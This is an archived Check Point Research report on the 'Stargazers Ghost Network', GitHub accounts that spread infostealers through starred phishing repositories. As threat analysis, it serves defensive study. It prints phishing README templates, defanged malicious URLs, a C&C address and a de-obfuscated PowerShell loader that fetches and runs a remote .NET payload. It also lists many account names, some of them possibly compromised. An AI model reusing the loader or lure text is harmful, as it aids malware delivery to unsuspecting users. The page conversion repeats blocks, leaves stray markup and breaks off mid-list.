Stargazers Ghost Network - Check Point Research By antoniost@checkpoint.com Published: 2024-07-24 · Archived: 2026-04-05 14:47:05 UTC Research by: Antonis Terefos (@Tera0017) Key Points Check Point Research identified a network of GitHub accounts (Stargazers Ghost Network) that distribute malware or malicious links via phishing repositories. The network consists of multiple accounts that distribute malicious links and malware and perform other actions such as starring, forking, and subscribing to malicious repositories to make them appear legitimate. This network is a highly sophisticated operation that acts as a Distribution as a Service (DaaS). It allows threat actors to share malicious links or malware for distribution through highly victim-oriented phishing repositories. Check Point Research is tracking the threat group behind this service as Stargazer Goblin. The group provides, operates, and maintains the Stargazers Ghost Network and distributes malware and links via their GitHub Ghost accounts. The network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine. Our latest calculations suggest that more than 3,000 active Ghost accounts are part of the network. Based on core GitHub Ghost accounts, we believe that the network began development or testing on a smaller scale for the first time around August 2022. Check Point Research discovered an advertiser in Dark-Web forums that provides the exact GitHub operation. The first advertisement was published on July 8, 2023, from an account created the previous day. Based on the monitored campaigns from mid-May to mid-June 2024, we estimate that Stargazer Goblin earned approximately $8,000. However, we believe that this amount is only a small fraction of what the actor made during that period. The total amount during the operations’ lifespan is estimated to be approximately $100,000. Stargazers Ghost Network appears to be only one part of the grand picture, with other Ghost accounts operating on different platforms, constructing an even bigger Distribution as a Service universe. Introduction Threat actors continually evolve their tactics to stay ahead of detection. Traditional methods of malware distribution via emails containing malicious attachments are heavily monitored, and the general public has become more aware of these tactics. Recently, Check Point Research observed threat actors using GitHub to achieve initial infections by utilizing new methods. Previously, GitHub was used to distribute malicious software directly, with a malicious script downloading either raw encrypted scripting code or malicious executables. Their tactics have now changed and evolved. Threat actors now operate a network of “Ghost” accounts that distribute malware via malicious links on their repositories and encrypted archives as releases. This network not only distributes malware but also provides various other activities that make these “Ghost” accounts appear as normal users, lending fake legitimacy to their actions and the associated repositories. Check Point Research has observed these accounts forking, starring, and watching malicious repositories, creating the illusion of a legitimate project and luring victims into downloading the “advertised” content. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 1 of 45 In a short period of monitoring, we discovered more than 2,200 malicious repositories where “Ghost” activities were occurring. During a campaign that took place around January 2024, the network distributed Atlantida stealer, a new malware family that steals user credentials and cryptocurrency wallets along with other personal identifiable information (PII). This campaign was highly effective, as in less than 4 days, more than 1,300 victims were infected with Atlantida stealer. The malicious links to the GitHub repositories were possibly distributed via Discord channels. The repositories targeted various types of victims who wanted to increase their followers on YouTube, Twitch, and Instagram and also contained phishing templates for cracked software and other crypto-related activities. Figure 1 – Stargazer Ghost account. Stargazers Ghost Network For quite some time, GitHub has been utilized as a platform to distribute malicious code. Typically, repositories involved in such activities are newly created for specific campaigns and often stay online for long periods of time before being taken down by GitHub or cleaned up by the threat actors. However, the content within these repositories usually does not suggest to a normal user that they should download and execute any of the hosted scripts or executables. These types of attacks do not aim to lure users into directly downloading and executing payloads from the repository itself. Instead, they often involve scripts that download and execute payloads from seemingly legitimate websites or sources. This approach helps maintain the appearance of legitimacy while delivering malicious content to victims. The Stargazers Ghost Network changes the game by providing a malicious repository where a malicious link is “starred” and “verified” by multiple GitHub accounts, thereby supporting its legitimacy. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 2 of 45 Figure 2 – Malicious GitHub account luring Twitch users. Often, the network utilizes identical tags and images but switches the “targeted audience” from one social media application or cracked software to another, but employing the same template. This suggests that the network operators automate these activities, ensuring efficiency and scalability in their operations. Figure 3 – TikTok, YouTube, Twitch, Instagram, … with the same phishing template.  The README.md phishing template contains a malicious DOWNLOAD link to an external website. In some instances, this link redirects victims to the Releases section of a malicious GitHub repository instead. GitHub usually tries to detect malicious https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 3 of 45 files or archives, though in many cases, the network uses password-protected archives that “hide” any malicious activities from scanning solutions. Figure 4 – Malware is distributed via password-encrypted archive releases. In this scenario, the README.md contains a phishing download link that does not even redirect to the repository’s own releases. Instead, it uses three GitHub Ghost accounts with different “responsibilities”: 1. The first account serves the “phishing” repository template. 2. The second account provides the “image” used for the phishing template. 3. The third account serves malware as a password-protected archive in a Release. This structure and operational method enable Stargazer Goblin to quickly “fix” any broken links that may occur due to accounts or repositories being banned for malicious activities. By distributing responsibilities across multiple accounts, the network ensures flexibility in replacing its compromised components. This minimizes disruption to their operations, allowing them to swiftly adapt and continue their malicious activities on GitHub. The third account, which serves the malware, is more likely to be detected. When this happens, GitHub bans the entire account, repository, and associated releases. In response to such actions, Stargazer Goblin updates the first account’s phishing repository with a new link to a new active malicious release. This allows the network to continue operating with minimum losses when a malware-serving account is banned. # [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat) ![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa) ### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions. **Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 4 of 45 - Support for multiple accounts to create organic traffic - Customize time intervals between "views" to simulate a real user - Simple and easy-to-use user interface - Support for proxy servers for anonymity and security - Work with social networks API - Proxy and anonymity of network requests - Web scraping and browser automation # [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat) ![trovos] (hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa) ### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions. **Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout. ## Features - Live viewers - Trovo Account creator - Chat bot - Follow bot - Shares - Mass report - Support for multiple accounts to create organic traffic - Customize time intervals between "views" to simulate a real user - Simple and easy-to-use user interface - Support for proxy servers for anonymity and security ## Technologies - C programming language - Work with social networks API - Proxy and anonymity of network requests - Web scraping and browser automation # [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat) ![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa) ### ViewBot is a tool designed to increase views and engagement on social platforms through an automated syste **Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of ## Features - Live viewers - Trovo Account creator - Chat bot - Follow bot - Shares - Mass report - Support for multiple accounts to create organic traffic - Customize time intervals between "views" to simulate a real user - Simple and easy-to-use user interface - Support for proxy servers for anonymity and security ## Technologies - C programming language - Work with social networks API - Proxy and anonymity of network requests - Web scraping and browser automation https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 5 of 45 To an experienced eye, those repositories seem suspicious. What tipped us off was the high number of “stars” received by each one of those repositories. Further investigation revealed that the accounts responsible for starring/”liking” these malicious repositories are integral to the same operation. Figure 6 – Stargazers of the malicious repository. We observed a pattern across many of those Stargazer Ghost accounts that contain a repository with these characteristics: 1. Repository name {username}1 . 2. Two created files: 1. The LICENSE of the project. 2. The README.md file. Further, the README.md contains as title the account name followed by “1” and text “1” . Repository: {username}1 , README.md content: # {username}1\n1 . https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 6 of 45 Figure 7 – GitHub Ghost accounts repository pattern. When we searched for that specific pattern, we discovered more than 1,100 repositories, which suggests the possibility of more than 1,100 Ghost GitHub accounts that are part of this malicious Stargazers network. Figure 8 – README.md content pattern. Each Ghost-Stargazer within the Stargazers network is not limited to interacting with just one repository. Many of these accounts engage with multiple repositories, with a significant portion of them clearly involved in malicious activities. However, some other starred repositories appear just as suspicious, such as some WordPress-related and gaming mods tools. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 7 of 45 Figure 9 – Ghost account starred repositories. Based on the wide variety of projects and “interests” of those Ghost Stargazers—ranging from playing Counter-Strike to Instagram influencers to hacking and protecting machines with cracked anti-virus software—we were able to discover additional malicious templates and further expand our collection of Ghost Stargazer accounts. Figure 10 – Game Cheat Repository. When malicious links redirect to GitHub releases, we’ve observed instances where associated accounts react by liking these malicious releases. This behavior further reinforces the projects’ perceived “legitimacy” for unsuspecting users. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 8 of 45 Figure 11 – Release reactions. To further separate the accounts and their actions, we discovered cases where other accounts that are also part of this network made commits to malicious phishing README.md files. Figure 12 – Commit to another’s account project. It’s not clear whether all those accounts were created by Stargazer Goblin for malicious purposes. As our research later suggests, some of those accounts are compromised. This makes GitHub credentials obtained by infostealers valuable and, furthermore, valuable enough to be sold and bought on underground markets. “Takedowns” & “Maintenance” Cycle The multiple and different roles provide easy network maintenance as GitHub will not take down all accounts related to the repository distributing the malware. This leaves the below accounts to continue their operations with minimal “damage” when actions are taken against the repository hosting the malware: 1. Repository-Phishing accounts. 2. Commit-Link accounts. 3. Stargazer accounts. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 9 of 45 4. and any Other accounts. The repository below buttercupserial/HubSpot-activation-by-nuat has been active since 2024-05-28 and has undergone 6 link changes. These 6 commits were made by buttercupserial/168463497+buttercupserial@users.noreply.github.com , maintaining the attack chain by updating the malware links. Figure 13 – Maintenance commits. Commit Date  Malware URL  2024-05- 28T10:21:50Z  hxxps://github[.]com/bludmooncutie2/bludmooncutie2/releases/tag/latest  2024-05- 29T07:35:32Z  hxxps://github[.]com/witch12138/test/releases/tag/lat  2024-06- 04T06:51:50Z  hxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat  2024-06- 06T07:40:15Z  hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new  2024-06- 10T02:09:27Z  hxxps://goo[.]su/gisof1sda –> hxxps://github[.]com/zigzagcharming643/zigzagcharming643/releases/tag/lat  2024-06- 10T09:13:52Z  hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new  The commits precisely modify the download link while keeping the remainder of the phishing template intact.  https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 10 of 45 Figure 14 – Link change. The latest link directs to a release featuring a password-protected archive Git_softwares_v1.1.2.7z which executes a GO downloader Setup_v1.1.2.exe ( SHA256:98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388 ) Figure 15 – Password-protected release. The network’s maintenance and recovery process appears to be automatic, detecting banned accounts/repositories and fixing them when necessary. Using different account roles ensures there is only minimal damage when and if GitHub takes action against accounts or repositories that violated its rules. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 11 of 45 Figure 16 – Stargazers Ghost Network Roles Overview. Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected. It’s common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one. The Commit account maintains a one-to-one relationship with all repositories under the Repository account. This means the same Commit account can make multiple commits to repositories that belong to the same Repository account. For typical campaigns, we usually observe the following requirements: One Repository account, that is the owner of the phishing repository hosting the link to download. One Commit account, which makes commits to the repositories belonging to the Repository account One Release account, which creates and adds a malicious archive to the repository’s release and daily updates the archive to stay undetected for a longer period. X Stargazer accounts, which fork/star/like the repositories and releases. In the above scenario, the Release account is usually the first to be banned. Then, the network operator creates a new malicious link and updates all the Link Repositories using their related Commit Accounts. In conclusion, 2 accounts (Repository/Commit), plus X number of Stargazers, remain under the radar, while 1 Release account will possibly be banned at some future point. These network roles managed to “bypass” in a way GitHub’s security measurements. Campaign I, Stargazers Ghost Network – Atlantida Stealer Check Point Research analyzed a specific case in detail, revealing a GitHub campaign that resulted in Atlantida stealer. The malicious GitHub link was possibly distributed via Discord, targeting Twitch users. The attack chain utilized malicious scripts hosted on compromised WordPress websites, making us wonder whether the suspicious GitHub repositories with code for WordPress sites could also play a role. https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 12 of 45 Figure 17 – Attack Chain Overview. The victim receives a link to a GitHub phishing repository and clicks on the malicious download link, which directs them to download a script from a WordPress website. The contacted PHP file, index.php , checks the Referer header from the HTTP request to verify whether the victim came from GitHub and if the IP address belongs to the TOR network or any other blacklisted IP. After validation, the PHP file redirects the request to download.php . README.md content: ## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php) ![window](hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3) ### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions. **Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout. - Automate page/video views on popular social platforms - Support for multiple accounts to create organic traffic - Customize time intervals between "views" to simulate a real user - Functionality to enhance interaction with content (likes, comments, subscriptions) - Simple and easy-to-use user interface - Support for proxy servers for anonymity and security - Python programming language - Work with social networks API - Proxy and anonymity of network requests - Web scraping and browser automation [![License](hxxps://img.shields.io/badge/License-MIT-green)](LICENSE) ## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php) ![window] (hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3) ### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 13 of 45 designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions. **Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout. ## Features - Automate page/video views on popular social platforms - Support for multiple accounts to create organic traffic - Customize time intervals between "views" to simulate a real user - Functionality to enhance interaction with content (likes, comments, subscriptions) - Simple and easy-to-use user interface - Support for proxy servers for anonymity and security ## Technologies - Python programming language - Work with social networks API - Proxy and anonymity of network requests - Web scraping and browser automation ## License [![License] (hxxps://img.shields.io/badge/License-MIT-green)](LICENSE) ## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php) ![window](hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3) ### ViewBot is a tool designed to increase views and engagement on social platforms through an automated syste **Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of ## Features - Automate page/video views on popular social platforms - Support for multiple accounts to create organic traffic - Customize time intervals between "views" to simulate a real user - Functionality to enhance interaction with content (likes, comments, subscriptions) - Simple and easy-to-use user interface - Support for proxy servers for anonymity and security ## Technologies - Python programming language - Work with social networks API - Proxy and anonymity of network requests - Web scraping and browser automation ## License [![License](hxxps://img.shields.io/badge/License-MIT-green)](LICENSE) The file downloaded is a .HTA file named Impress_V1.0.2.hta . This file contains a malicious iframe with a link executing the VB script code. [hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml) [Skip to main content](#content) [#](#) [About](.co/) https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 14 of 45 [ass="s-popover--arrow"> [Public questions & answers [hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml) [Skip to main content](#content) [#](#) 1. [About](.co/) 2. [ass="s-popover--arrow"> 1. [Public questions & answers](.com/questions) 2. [hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml)](#)](.com/questions)](#)
  • The VB script contains obfuscated code that executes PowerShell, which in turn runs remote code from another WordPress website. The VB De-obfuscated code: PowerShell code executing a .NET Injector. [DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); Add-Type -MemberDefinition $crop213 -Namespace "crumble542543" -Name "culture6546" $danger5646 = [crumble542543.culture6546]::GetConsoleWindow() [crumble542543.culture6546]::ShowWindow($danger5646, 0) [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("hxxps://astrahebz.com/te/tetete.bin")).EntryPoint.Invoke($null, @($null)) $crop213 = @' [DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); '@ Add-Type -MemberDefinition $crop213 -Namespace "crumble542543" -Name "culture6546" $danger5646 = [crumble542543.culture6546]::GetConsoleWindow() [crumble542543.culture6546]::ShowWindow($danger5646, 0) [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("hxxps://astrahebz.com/te/tetete.bin")).EntryPoint.Invoke($null, @($null)) $crop213 = @' [DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 16 of 45 '@ Add-Type -MemberDefinition $crop213 -Namespace "crumble542543" -Name "culture6546" $danger5646 = [crumble542543.culture6546]::GetConsoleWindow() [crumble542543.culture6546]::ShowWindow($danger5646, 0) [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("hxxps://astrahebz.com/te/te This .NET injector creates a process of regasm.exe and injects a shellcode. Finally, the malware dropped is Atlantida stealer with C&C, 185.172.128.95 . The Stealer’s network communication is unencrypted plain text. The first connection sends IP information to 185.172.128.95:6666 , and in the next sends to 185.172.128.95:6665 an archive with stolen information Screenshot.jpeg , User Infromation.txt , Geo Information.txt , BrowserInfo.txt and for each Browser, the Cookies/History/… Figure 20 – Bot’s first request. Figure 21 – Bot’s second request. This campaign appears to have targeted victims who wanted to increase their “followers audience” in Twitch, Instagram, YouTube, Twitter, Trovo, and TikTok or use other tool-related features for Kick Chat, Telegram, Email, and Discord. Some of those malicious repositories distributing this template and phishing link were: glassmuysa/Htlx-Gen-Check gooles54/Rison-Trading-Bot valiso0/Mail-Ac-Generator armoly/Discord-Bot armoly/Ds-Spm armoly/Email-Spm armoly/Tg-Spm armoly/Tg-SpmTg-Spm armoly/Twt-Spm bleblquck/FT-Vieww bleblquck/Kck-Vw bleblquck/Trv-Vws bleblquck/Tw-Vws dscvm/Discord-Vbot dscvm/Visoul-Grabber glassmuysa/Htlx-Gen-Check glassmuysa/Mail-Ac-Gen glassmuysa/TwT-Genr glassmuysa/Ytb-Dwnld gooles54/Rison-Raid-Bot gooles54/Rison-Trading-Bot gooles54/WPscn lzero121/TWT-vWS lzero121/Ytb-Vws lzero121/iNS-vWS lzero121/tK-vWS memekch/TWT-vWS memekch/Ytb-Vws memekch/iNS-vWS memekch/tK-vWS memo1l/ChatGpt-Turbo sokratso/KMSpic-Ac valiso0/Mail-Ac-Generator valiso0/TwT-Gen valiso0/Ytb-Dwnld armoly/Discord-Bot armoly/Ds-Spm armoly/Email-Spm armoly/Tg-Spm armoly/Tg-SpmTg-Spm armoly/Twt-Spm https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 17 of 45 bleblquck/FT-Vieww bleblquck/Kck-Vw bleblquck/Trv-Vws bleblquck/Tw-Vws dscvm/Discord-Vbot dscvm/Visoul-Grabber glassmuysa/Htlx-Gen-Check glassmuysa/Mail-Ac-Gen glassmuysa/TwT-Genr glassmuysa/Ytb-Dwnld gooles54/Rison-Raid-Bot gooles54/Rison-Trading-Bot gooles54/WPscn lzero121/TWT-vWS lzero121/Ytb-Vws lzero121/iNS-vWS lzero121/tK-vWS memekch/TWT-vWS memekch/Ytb-Vws memekch/iNS-vWS memekch/tK-vWS memo1l/ChatGpt-Turbo sokratso/KMSpic-Ac valiso0/Mail-Ac-Generator valiso0/TwT-Gen valiso0/Ytb-Dwnld At the same time, more than 380 Stargazer Ghost accounts starred the ~30 repositories listed: 0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha9310, AmirChidan9, AngelFx777, Aniketgamingx, ArsanyAbdalla, Aubskobbes5, Azang123, Badno2055, Bahaabasuny0, Bazarasxx, BilalPasta, Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Coding, Cortjiani, D4RK4T, DSB1973, Danish24123, DavidGruz, Detroit16, Drakanobr, Emaynike, EneerOP, Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOXKEVINO, GabrielFel, GabrielHorbach, GabrielHorbach,, Gabst7, Gaplaster3600, Ghadir450, Git, Gokumase, Gonachapa, GurujiIsLive, Hassanjanjua, Haxrusxx, Housamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jasonnoi, Jayko235, Jayxxx14, Jessy55491, JhonataLim, Jockymaxi, JonathanLaraAguirre, Jtayyab007, KaizerEmre, KenderMendoza2, Kets357, Kimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagordo, LeoBello00, Lyonnais, Lyonnais-2008, M-Asghar8atk, MHCYT, Madulahstaxks, MahmoudRede, Malek50, Mallco14,, Marco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator, MuhammadBayuPriyatna, MuhammadRamzan123, Mustangth666, Nannydream, Nealhag, Neivolan, NexoCreeper, Nikolas145, Nitanzw, NobiKazi, Oeslen, OrucMuhammed, OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT2207, Rajveer8169, RefiElisa, Richard-Petty-Cru, RikuAAAAA, Riles923, RimuruNeto, RolandSandorNagy, RoyalLegend0304, Ruhan44, SaidDEV89, https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 18 of 45 SaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,, StrikerJapa, SusannBaldiviezo, Syedhamzaalishah, SzaSza2, TUNA-V, Technogun92, Thanakys, ThawHtooZin, ThiagoSilva97, Tomasdionisio, TulioInnoveSistema, Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILWAP, Wanmeng811, Warungkakek, WeFacaa, Winzume, YakultGo, Yinyang26, Yokeshraj2001, Youssef, Zecuss, Zekoahmed, Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, aminov1010, anaskhan785, anasskeda, aninha1kstro, asayahandatgr, asdasfazamazsdgfdsg, asdssfsd, asliyiilmaz, asmuiahmad, asmuiahmad,, atoras34, axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblancolascarez, deepak, deepak-gurjar07, deseplikon, dikiprsty, dnomesh, ecoplayer07, egoistpanel, elMarkoDev, epsilon201, f4h3m, fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev, imazen59, imbored112, ismailsawadi, issabii, jahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030, khaledbenz2009, khanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, larryewakins, lawadas1231, lenegropu, lilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz, lucasstarley, lukeomatik, lyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marcosibottino, mariamlola, mateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122, misterclima, mjsal, mohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan, nendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost, noobking1234, noobking1234,, notayessir, notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea, pierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo, ramdoni, ratihpurnamasar, raul2341, razzm7, rbxrecoveryexploits, rcrobcarlos, rdiaz-002, reekid84, revelicate, reynaldirey18, richiewrld, rico260104, ricogann, riendlek, riftal12, riocdr, rtR4RWp, rudy172, rxcw777, saadanjaved, saintxzx, saivaibhavtamiri, samiranf, sarathi, sejgseok, sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599, tajokshare2023, tamsirdiarra4, teejw, thedani1122, therotmaxxer, titiobig, tjwpo, tonyOsama1546, trev2coldfrr, tvixterSourceCode, txxzclew, ugyen27, ultralinksgh, vault797478, victid, wa314444, watcharaponnar, webdevuacs, wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, yokamm, yoosef30, yourscloudyy, yuong22, z8lc, z8lc60go, zaayaz, zefgzeragze, zuhdi, zuhdi-in 0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha9310, AmirChidan9, AngelFx777, Aniketgamingx, ArsanyAbdalla, Aubskobbes5, Azang123, Badno2055, Bahaabasuny0, Bazarasxx, BilalPasta, Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Coding, Cortjiani, D4RK4T, DSB1973, Danish24123, DavidGruz, Detroit16, Drakanobr, Emaynike, EneerOP, Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOXKEVINO, GabrielFel, GabrielHorbach, GabrielHorbach,, Gabst7, Gaplaster3600, Ghadir450, Git, Gokumase, Gonachapa, GurujiIsLive, Hassanjanjua, Haxrusxx, Housamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jasonnoi, Jayko235, Jayxxx14, Jessy55491, JhonataLim, Jockymaxi, JonathanLaraAguirre, Jtayyab007, KaizerEmre, KenderMendoza2, Kets357, Kimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagordo, LeoBello00, https://research.checkpoint.com/2024/stargazers-ghost-network/ Page 19 of 45 Lyonnais, Lyonnais-2008, M-Asghar8atk, MHCYT, Madulahstaxks, MahmoudRede, Malek50, Mallco14,, Marco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator, MuhammadBayuPriyatna, MuhammadRamzan123, Mustangth666, Nannydream, Nealhag, Neivolan, NexoCreeper, Nikolas145, Nitanzw, NobiKazi, Oeslen, OrucMuhammed, OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT2207, Rajveer8169, RefiElisa, Richard-Petty-Cru, RikuAAAAA, Riles923, RimuruNeto, RolandSandorNagy, RoyalLegend0304, Ruhan44, SaidDEV89, SaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,, StrikerJapa, SusannBaldiviezo, Syedhamzaalishah, SzaSza2, TUNA-V, Technogun92, Thanakys, ThawHtooZin, ThiagoSilva97, Tomasdionisio, TulioInnoveSistema, Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILWAP, Wanmeng811, Warungkakek, WeFacaa, Winzume, YakultGo, Yinyang26, Yokeshraj2001, Youssef, Zecuss, Zekoahmed, Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, aminov1010, anaskhan785, anasskeda, aninha1kstro, asayahandatgr, asdasfazamazsdgfdsg, asdssfsd, asliyiilmaz, asmuiahmad, asmuiahmad,, atoras34, axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblancolascarez, deepak, deepak-gurjar07, deseplikon, dikiprsty, dnomesh, ecoplayer07, egoistpanel, elMarkoDev, epsilon201, f4h3m, fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev, imazen59, imbored112, ismailsawadi, issabii, jahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030, khaledbenz2009, khanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, larryewakins, lawadas1231, lenegropu, lilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz, lucasstarley, lukeomatik, lyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marcosibottino, mariamlola, mateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122, misterclima, mjsal, mohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan, nendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost, noobking1234, noobking1234,, notayessir, notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea, 